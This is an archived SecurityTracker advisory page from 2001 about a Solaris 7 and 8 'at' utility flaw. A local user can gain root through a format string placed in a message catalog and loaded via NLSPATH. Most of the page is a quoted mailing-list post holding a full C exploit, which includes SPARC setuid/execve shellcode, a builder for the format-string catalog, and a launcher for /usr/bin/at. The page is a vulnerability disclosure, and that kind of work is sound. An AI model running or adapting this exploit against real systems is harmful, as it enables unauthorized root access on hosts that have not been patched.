SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   At Vendors:   Sun
(Exploit Code is Provided) Re: Solaris at Utility Lets Local Users Gain Root Access
SecurityTracker Alert ID:  1001929
SecurityTracker URL:  http://securitytracker.com/id/1001929
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 5 2001
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Solaris 7 and 8
Description:   A vulnerability has been reported in the Sun Solaris at command-batch utility that allows local users to gain root-level privileges on the host.

A local user can reportedly create an arbitrary format string in a custom message database that will be fetched by the gettext() function as part of the locale subsystem's internationalization capabilities. The local user can set the NLSPATH environment variable to point to the user-created message database. By using the "at" command [possibly with specific command line arguments], the local user can cause the the format string to be executed with root level privileges. This will happen because gettext() will look for the appropriate translated message to display by following the NLSPATH environment variable, finding the user-created format string in the user-created custom message database.
Impact:   A local user can cause arbitrary shell commands to be executed on the host with root-level privileges.
Solution:   The author of the report indicates that Sun has patched this vulnerability.
Vendor URL:  www.sun.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:   UNIX (Solaris - SunOS)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 12 2001 Solaris at Utility Lets Local Users Gain Root Access


 Source Message Contents
Date:  Thu, 5 Jul 2001 18:36:44 +0800
Subject:  Re: "at" is vulnerable on Solaris 7 and 8


Hi all, 

I am sorry for loosely checking
In fact, Sun has the patch before I found this....:p

Here is the exploit...
--
Huang-Yu Wang
hank@aimsecurity.net

--

/*
  NLSPATH, gettext() vulnerable on Solaris/SPARC 7, 8
  by Hank Wang <hank@aimsecurity.net>

  1. use dump mode to dump memory
  2. alignment of shellcode and command arguments
  3. get the address of shellcode and stack skip
  4. return address location is top address - 0x10
  5. run exploit mode with parameters
*/
#include <stdio.h>
#define SHADDR 0xFFBEFF6C
#define RETLOC 0xFFBEF5BC
#define SKIP 607
#define NOP "\x92\x12\x40\x09"

unsigned long shellcode[]= {
        // setuid 0
        0x901a4009,     // xor %o1, %o1, %o0
        0x82102017,     // mov 0x17, %g1
        0x91d02008,     // ta 8
        // dup2
        0x90102002,     // mov 2,%o0
        0x94102001,     // mov 1,%o2
        0x92102009,     // mov 9,%o1
        0x8210203e,     // mov 0x3e,%g1
        0x91d02008,     // ta 8
        // execve /bin/sh
        0x9422800a,     // sub  %o2, %o2, %o2
        0x9023a008,     // sub  %sp, 8, %o0
        0x210bd89a,     // sethi  %hi(0x2f626800), %l0
        0xa014216e,     // or  %l0, 0x16e, %l0
        0xe023bff8,     // st  %l0, [ %sp + -8 ]
        0x210bdcda,     // sethi  %hi(0x2f736800), %l0
        0xe023bffc,     // st  %l0, [ %sp + -4 ]
        0x9223a010,     // sub  %sp, 0x10, %o1
        0xd023bff0,     // st  %o0, [ %sp + -16 ]
        0xc023bff4,     // clr  [ %sp + -12 ]
        0x8210203b,     // mov  0x3b, %g1
        0x91d02008,     // ta  8
        0x00000000
};

int dump=0, exploit=0;
int shpad=0, argpad=2, skip=SKIP;
unsigned long shaddr=SHADDR, retloc=RETLOC;

void usage(char *prog)
{
  printf("%s [dump|exploit] [parameters]\n", prog);
  printf("parameters:\n");
  printf("\t--skip=<skip stack>\n");
  printf("\t--argpad=<num>: alignment of command args\n");
  printf("\t--shpad=<num>: alignment of shellcode\n");
  printf("\t--shaddr=<shellcode addr>\n");
  printf("\t--retloc=<return address location>\n");
  exit(0);
}

int mygetopt(int argc, char **argv)
{
  int i;

  if(!strncmp(argv[1], "dump", 4)) {
    dump=1;
  }
  else if (!strncmp(argv[1], "exploit", 4)) {
    exploit=1;
  }
  else {
    return -1;
  }

    for(i=2; i<argc; i++) {
      if (!strncmp(argv[i], "--skip=", 7)) {
        skip=atoi(argv[i]+7);
      }
      else if (!strncmp(argv[i], "--shpad=", 8)) {
        shpad=atoi(argv[i]+8)%4;
      }
      else if (!strncmp(argv[i], "--argpad=", 9)) {
        argpad=atoi(argv[i]+9)%4;
      }
      else if (!strncmp(argv[i], "--shaddr=", 9)) {
        shaddr=strtoul(argv[i]+9, 0, 16);
      }
      else if (!strncmp(argv[i], "--retloc=", 9)) {
        retloc=strtoul(argv[i]+9, 0, 16);
      }
      else {
       return -1; 
      }
    }
  return 1;
}

void makemo()
{
  char msg[4096], pattern[16];
  FILE *fp;
  int i, j, r, q;
  unsigned long hw;
  int first, next, last;
  
  r=skip%8;
  r=r?r:8;
  q=skip/8;
  q=(r==8)?q-1:q;

  memset(msg, 0x00, 4096);

  strcpy(msg, "msgstr ");
  if (exploit) {
    hw=(shaddr & 0x0000ffff);
    first=(hw/skip);
    next=hw-(first*(skip-1));
    last=((shaddr & 0xffff0000) >> 16) - hw;
    sprintf(pattern, "%%0%dx", first);
    for(i=0; i<q; i++) {
      strcat(msg, "\"");
      for(j=0; j<8; j++) {
        strcat(msg, pattern);
      }
      strcat(msg, "\"\n");
    }
    strcat(msg, "\"");
    for(j=0; j<r-1; j++) {
      strcat(msg, pattern);
    }
    sprintf(pattern, "%%0%dx", next);
    strcat(msg, pattern);
    strcat(msg, "\"\n");

    strcat(msg, "\"");
    strcat(msg, "%hn");
    sprintf(pattern, "%%0%dx", last);
    strcat(msg, pattern);
    strcat(msg, "%hn");
    strcat(msg, "\"\n");
  }
  else {
    for(i=0; i<q; i++) 
      strcat(msg, "\"%08x %08x %08x %08x %08x %08x %08x %08x\\n\"\n");
    strcat(msg, "\"");
    for(i=0; i<r-1; i++)
      strcat(msg, "%08x ");
    strcat(msg, "%08x");
    strcat(msg, "\\n\"\n");
  }

  fp=fopen("foo.po", "w");

  fprintf(fp, "%s\n", "msgid \"commands will be executed using %s\\n\"");
  fprintf(fp, "%s", msg);
  fclose(fp);

  system("msgfmt -o SUNW_OST_OSCMD foo.po");
}

int makefile(char *file)
{
  unsigned long high, low;
  char *p;
  char cmd[64];
  
  high=retloc+2;  
  low=retloc;

  strncat(file, "AAAA", argpad); 
  p=(char *)&high;
  strncat(file, p, 4);
  strcat(file, "AAAA");
  p=(char *)&low;
  strncat(file, p, 4);
  strncat(file, "AAAA", 4-argpad);
  strcpy(cmd, "touch ");
  strcat(cmd, file);
  system(cmd);
}

int main(int argc, char *argv[])
{
  char *prog;
  char file[20];
  char eggshell[128];
  char nlspath[]="NLSPATH=:.";
  int i;
  char *p=(char *)&shellcode;
  char *env[3]={eggshell, nlspath, NULL};

  prog=argv[0];
  if(argc < 2) {
    usage(prog);
  }
  if (mygetopt(argc, argv)==-1) {
    usage(prog);
  }
  printf("skip=%d, shaddr=0x%08x, retloc=0x%08x\n", skip, shaddr, retloc);
  fflush(stdout);

  makemo();
  memset(file, 0x00, 20);
  makefile(file);

  memset(eggshell, 0x00, 128);
  strcpy(eggshell, "EGGSHELL=");
  strncat(eggshell, "AAAA", shpad);
  for(i=0; i<4; i++)
    strcat(eggshell, NOP);
  strcat(eggshell, p);
  strncat(eggshell, "AAAA", 4-shpad);


  execle("/usr/bin/at", "at", "-f", file, "-t", "07010100", NULL, env);
}


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC